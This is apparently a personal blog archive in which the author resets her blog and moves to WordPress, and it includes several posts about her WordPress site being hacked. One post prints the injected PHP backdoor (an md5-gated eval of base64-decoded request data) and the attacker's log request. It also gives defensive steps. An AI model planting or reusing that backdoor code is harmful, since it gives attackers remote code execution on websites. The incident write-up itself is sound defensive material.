Same Words, Better Contrast

Three people in the last day or so have mentioned that this blog’s grey text on a white background is really hard to read. I swear I did not that do that on purpose, and I suspect that something in my theme changed out from under me. (this is the hazard of inheriting from an existing theme vs writing your own.)

I’ve darkened all the body text and I hope it is easier to read now.

On the Subject of a Blog Reset, as a Series of Questions

Q: I thought you abandoned your blog in 2013 for twitter.

I did! And I’ve felt insanely guilty about it ever since.

Recently, however, I’ve been having more conversations on twitter where the 140-character limit is, well, limiting. I’ve found it frustrating to make any kind of a complex argument across a tweet thread, even with linked conversations. Some thoughts need more room.

I’ve also wanted for some time now to get back into the habit of writing for fun. The full-time day job I had until recently was sucking up a lot of my writing energy, and I’ve done very little writing in the last bunch of years that wasn’t job-related, or 140 characters or less.

But I recently left that day job, now is as good a time as any for a full-on blog reset.

Q: What happened to blog.lauralemay.com?

Ages ago I set up my blog on a separate subdomain from my “main” site, and I can’t remember why. It seemed like a good idea at the time, maybe?

Having two different sites ended up being more annoying than I had intended. For one thing, I was trying to maintain two entirely different wordpress installs, with separate themes and plugins. (Yes, I know about WP multisite, and at the time I could not get it to work. LS;B (Long story, boring)).

With the reset I have merged everything back into www.lauralemay.com and a single wordpress install. The blog.lauralemay.com site still exists but I’m planning to put in a redirect once things here have settled down.

Q: I can’t believe you’re still using WordPress when you got so badly hacked, repeatedly, in the past. What’s wrong with you?

This is really a case of “better the devil you know.”

My original plan for a new blog had been to set up something simpler, easier to understand, and less prone to hacking problems than WordPress.

I spent a couple months earlier this year down a rabbit hole of learning all about static site generators (like Jekyll and Pelican and Hyde) for just this reason.

But the deeper into that rabbit hole I got, the more I realized how much work it was going to be to modify any static site software to output the design and structure and functionality I wanted. The time investment was going to be way more than I was willing to spend given that the actual goal was to write more, not spend more time working on software, or being my own sys admin.

WordPress has its issues, and I’ve seen a lot of them, but I understand it fairly well at this point. Also the community around themes and plugins is so rich that using WordPress gives you a huge step up in building a blog-like site versus starting everything from scratch.

Q: Yes, OK, but the hacking thing?

I figured out the hacking thing. If you put wp-login.php and the entire wp-admin directory behind access control (I use .htaccess) then the hacking stops. My old blog (and my old site) have been locked down like this for three years and I have had no further issues at all. (This is not a challenge.)

Q: You don’t have comments enabled. When are you going to turn comments back on?

I’m not. I did leave the old comments in place on my old blog posts because it felt weird to just delete them. New posts do not have comments, and won’rt.

Even on a blog as little-read as this one just managing spam in the comments was a pointless time sink. Replying to and managing actual real-life comments was also a lot less fun than I had thought it would be. At best I feel like I’m not keeping up, and guilty for not engaging better. At worst there are seemingly endless numbers of blowhards who use my comments to lecture or “well-actually” me, or to argue at length about things only semi-related to my actual posts. There are plenty of places to have an opinion on the Internet. This is mine. Get your own blog.

I am easily found on twitter or email if you really want to talk to me about something I’ve written.

Q: Are you going to talk endlessly about octopus and chickens all the time like you did before?

Yes! Also food, and cooking, and gardening. No links (those go on twitter). More personal stuff. And (I hope) much shorter posts rather than the 20-page essays and the immense multipart sagas I was doing before. (This post so far is not a good start.)

You will also occasionally see a post about technical writing, which is what I do for a living and a subject I feel strongly about (Yes, I know, I am strange). I am still figuring out the right way to categorize different subjects in the same blog, so we’ll see.

Titles will be properly uppercased this time around as well.

Q: Your ideas are intriguing to me and I wish to subscribe to your newsletter.

My new RSS feed is at https://www.lauralemay.com/feed. A blog-only feed (no pictures, links, tweets or other stuff sucked in from elsewhere) is https://www.lauralemay.com/blog/feed. You can also follow me on twitter for new post alerts.

in which actual fiction occurs

I’ve posted a new short story over on my main site.  It’s called The Deadline, and it’s a sort of dotcom horror thing.  This is actually a new/old story:  I started writing it in 1999 and never finished it. I recently dug it up again and realized it wasn’t that bad, although it’s kind of dated.  I finished it and updated some of the more obvious anachronisms but it still has a strong 1999 feel.

I also finally got around to updating the design of my main site and putting everything back into content management.  The one advantage of rebuilding wordpress a couple of times is that I’ve become very good at it.  (wan smile)

hacked, the followup

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, Again!)

I’ve done nearly all the design updates I’m going to do to the blog for now although I have a plenty large To Do list left. Sadly it’s an almost entirely different To Do list than I had before this mess happened.

This is my technical followup to what happened; you can skip it if you don’t care about the details. It is long (of course). I’ll get back to talking about chickens and food soon enough.

We ended yesterday with a complete reinstall of all the files on all my web sites, including a brand new version of WordPress and a new database for this blog. In retrospect, this is what I should have done straight off on monday. The #1 thing I have learned from this is when in doubt, assume it is WordPress and nuke it from space.

Notes on WordPress Security

I’m 99% sure that my hacker got into WordPress via a script called timthumb. This is a known WordPress vector for abuse — tons of themes and plugins use this script. In my case it was my theme, Thesis, that used it. This timthumb page has a lot of technical detail about why it is a problem, although the phrase “allowing hackers to upload and execute arbitrary PHP code” generally says it all.

There is a WordPress plugin called Timthumb Vulnerability Scanner that will check your entire WordPress installation for old versions of timthumb and made sure you are not subject to this hack. Note that I was using a current version of a respected paid theme and the most recent version of WordPress and the timthumb vulnerability was still there.

I also use the wp-security plugin for general WordPress security, which encourages you to make some of the more obvious changes to wordpress to keep hackers out (removing the admin account, renaming your database tables, etc.). I admit I had not implemented everything that wp-security recommended, because I was lazy. But even if I had it would not have helped with the timthumb hack.

The makers of wp-security have a web site called Website Defender that does much more in-depth security testing of your installation. I hadn’t gotten around to signing up for or installing the Website Defender tools (it requires some PHP to be placed on your web site, which, frankly, worried me right there). But a few people on twitter recommended it, so once I got my new software installed I set it up, and it looks MUCH more comprehensive for protecting WordPress. I kind of consider it anti-virus software for WordPress. They can keep track of new vulnerabilities so I don’t have to.

Lurking Horror in Non-Static Static HTML

I had been worried yesterday that my hacker was somehow able to modify files in my static HTML sites (my www.lauralemay.com and work.lauralemay.com sites) from the hacked WordPress blog site. This led me to believe that I actually had a worse hacker than just a web-based script-kiddie. It turns out I was wrong. PHP was the problem, and I had PHP everywhere that I just didn’t know about or wasn’t paying attention to. This was my fault for not being more diligent.

In the case of my www site, I once ran Movable Type there, and although I had turned off the itself software years ago I still had the files sitting around in the directory and accessible from the web. Tons of PHP floating around in there. This was dumb of me to keep around — especially since it was a very old version of Movable Type.

I was sure that my work site was safe — I wrote all that myself, in plain HTML and CSS. And then buried deep in a sub-sub-sub directory I found one PHP file that Dreamweaver of all things had written as part of “design notes” for the site. I know there was one time I used DreamWeaver for the site but it was years ago and I thought I had long since deleted all those extra notes directories. ONE FILE I didn’t even know was there, but the hacker scripts found it, and that was all it took. (Fortunately all I had to do was trash that one file and that was the end of it.)

I See You

While I was sitting around waiting for stuff to install and reimport and whatnot I got to thinking that maybe there were traces of my hacker in my access and error logs. Fortunately this is not a high-traffic web site (hah), so I could grep out typical requests and page through the rest of my logs without having to look at a zillion lines. A whole lot of lines like this one immediately stood out:

46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?
img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs= 
HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0; 
Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C)" 

I know of no legitimate reason for anyone to request anything inside wp-admin unless they are actually administering the site. There’s especially no reason to request schema.php, and no reason at all to give it arguments (img_id and mod_content). I had a copy of my hacked site on my local machine, and I took a look at schema.php. Bingo. Right at the top of the file, above the comments:

<?php if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434")
&& isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST
["mod_content"])); exit(); } ?>

eval(base64_decode you say? I don’t think so. I searched my entire blog site, and found about ten PHP files all over the place that had these lines scribbled at the start. Then I looked through my log files and there was my hacker, always at the same IP address, always pinging those same hacked files.

None of this actually really mattered, since I had trashed all the hacked filed when I reinstalled WordPress. But one of the first things I did when my new site was set up was to block that IP address. And today as I watch my logs roll by I am pleased to see client denied by server configuration coming up again and again.

Feeeelings

I’m not feeling the least bit confident about web software right now, and thinking about the security problems of complex web applications in general is making me break out in hives. It seems that the more complex a web app is the more likely it is that someone out there is going to fuck with it, and I just don’t have the time for that. I went to shared hosting precisely because I was tired of being my own sys admin. I can do it, but I’m not all that good at it, and I don’t want to. I want to write.

On the other hand, the idea of giving up all the administration and putting all my stuff in the cloud also doesn’t give me happy warm fuzzies. Because of course in that situation the cloudmasters are hadooping away on everything I do and generating all sorts of valuable advertising thneeds.

Either way it seems I’m eventually going to be pwned by someone.

grumble.

hacked, again!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, the Followup)

It turns out that everything I did yesterday made no difference at all, and my hacker came back in overnight and rewrote my files all over again.

So today I blew away all the files on my web host including the WordPress install and the database and started all over again. While I was doing that I took the opportunity to update the theme software (I use thesis), and since I was there scrabbling around with CSS and PHP I made some design changes I had been wanting to do anyhow.

I have another technical post I want to make because I figured out how the hacker got in and exactly what he or she was doing, and there’s still a bunch of stuff missing from the site, but right now I am tired and hungry and I’d like to be done for today.

I apologize if you were desperate to read my long-winded pointless ramblings while I had the site offline.

hacked!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked, Again! and Hacked, the Followup)

So, I had a fun afternoon, how about you?

A week or so ago, I noticed an odd thing: Google Reader had stopped updating my blog feeds. Around that time I had been mucking with the blog feeds (see Housekeeping) so I figured maybe I had confused Google Reader, and if I ignored it, maybe it would go away.

Hint: if Google gets annoyed at your web site, perhaps there is something wrong with your web site.

Then yesterday I noticed that if I unsubscribed to my blog feed in Google Reader and resubscribed to it, the title to my blog would not come up. Instead Google Reader decided the title was “Personal Creations Elmo, Consumer Payday Loans – $300 – $2500.”

I became indignant. My blog looked fine to me. It looked fine from a variety of other locations. The code looked fine if I grabbed it with curl. Something was wrong with Google.

Hint: It’s unlikely something is wrong with Google. Something might be wrong with your site.

Then it got worse and it spread to my search results:

Googlesearch

At the same time a friend sent me a screen shot of my web site as he saw it:

Screenshot 5 1

Yeah, I got hacked. But it was a selective hack; only the google and yahoo crawlers and referers from google and yahoo saw it. (no one actually uses the Yahoo search engine.)

I spent the day cleaning up from this hack, including doing it twice because it came back. I still don’t know where it came from or if its going to come back again. This was not a lot of fun.

I googled what I found and turned almost no information at all; no exploits, no descriptions, no patches, nothing. I don’t know if what I had was new, or if it was obscure, or what. Technical details in the More part of this post. Continue reading

Housekeeping

I’ve made a ton of fixes to the blog and to my main web site over the last week, including the broken archive links as well as redirects for links and ancient feeds that have been broken for years. In particular: you livejournalers are probably going to start seeing me again for the first time since 2007.

I note from the logs that a lot of people browse this blog by category. Only about 30% of the site is categorized; I’m still working on that.

Contact form is still broken.

I can write OR I can go make stuff OR I can maintain ever-decaying blog software. Mutter.

How to make a complete mess of a blog reboot

This last weekend since it was a long holiday weekend I was thinking it was way long past due I started posting to my blog again. But instead of actually just posting I was fiddling around in the back end software, fixing links, adding categories, updating plugins and themes and playing with fonts. Because of course fussy repetitive software fiddling is just so much easier than actually writing anything. (Especially writing anything over 140 characters these days (guilty expression)).

But then late on Sunday there was this auto-tagging plugin that did something stupid, and then there was a plugin to remove the thousands of tags that the auto-tagging plugin created but didn’t, and then there was a theme upgrade that went awry, and a theme downgrade that went even more awry. And after a couple hours of fiddling I found myself staring at a blog that not only didn’t have any new posts in 18 months, it was also worse, organizationally, than when I started, AND it was completely unreadable.

Hooray!

Fortunately, I’ve been making database backups this whole time. Unfortunately, I didn’t have a clue what to do with a database backup should I need to restore it. And it’s kind of unnerving to stand on the edge of a precipice staring at a database interface that’s asking you, “are you SURE you want to drop all the tables in this database? Are you REALLY sure?  REALLY REALLY SURE??” Because I really really wasn’t sure.

But to make a pointless long story short, I got the blog back, I got my design back, all of the fiddling I did yesterday got wiped out, and I’m back to where I started, with no new posts in 18 months.

Except, now, this one.

If you can see this, I am alive

It is nice when months of fretting pays off in a ten-minute update with only a few dumbass PHP errors.

There are still some messy bits here and old links are broken. I have some new images to put in later on when I finish drawing them. And the “www” part of the site is still old. But it’ll be easier to fix everything now that the new blog is settled into its new home.

lockdown, migration imminent

I’ve closed down comments on all the posts here in preparation for a big blog move. I’m migrating all my web sites over to WordPress, with a new simpler structure and an integrated redesign. I think I’ve planned everything out, and I’ve done most of the work on a testing site, but who knows how well it’ll actually work when I put it all in place. This old site you’re looking at is a really old movable type installation with a lot of hand-built customizations, most of which were really stupid in retrospect (my urge to tinker won out over basic common sense). The conversion has been a lot more painful as a result.

The biggest change for many of you will be a new feed URL. The old blog supported every variety of feed flavor; the new blog will have only one feed (RSS) and it’ll be at a different URL. (https://www.lauralemay.com/feed)

I’ll redirect all the old feed URLs to the new feed but I don’t know how well that’ll work for feed readers. I’ll also put up a reminder post in the old feeds when the conversion goes through.

This is not like putting a lander on mars or anything, but my goal for all this brouhaha is to make it easier for me to actually, you know, write.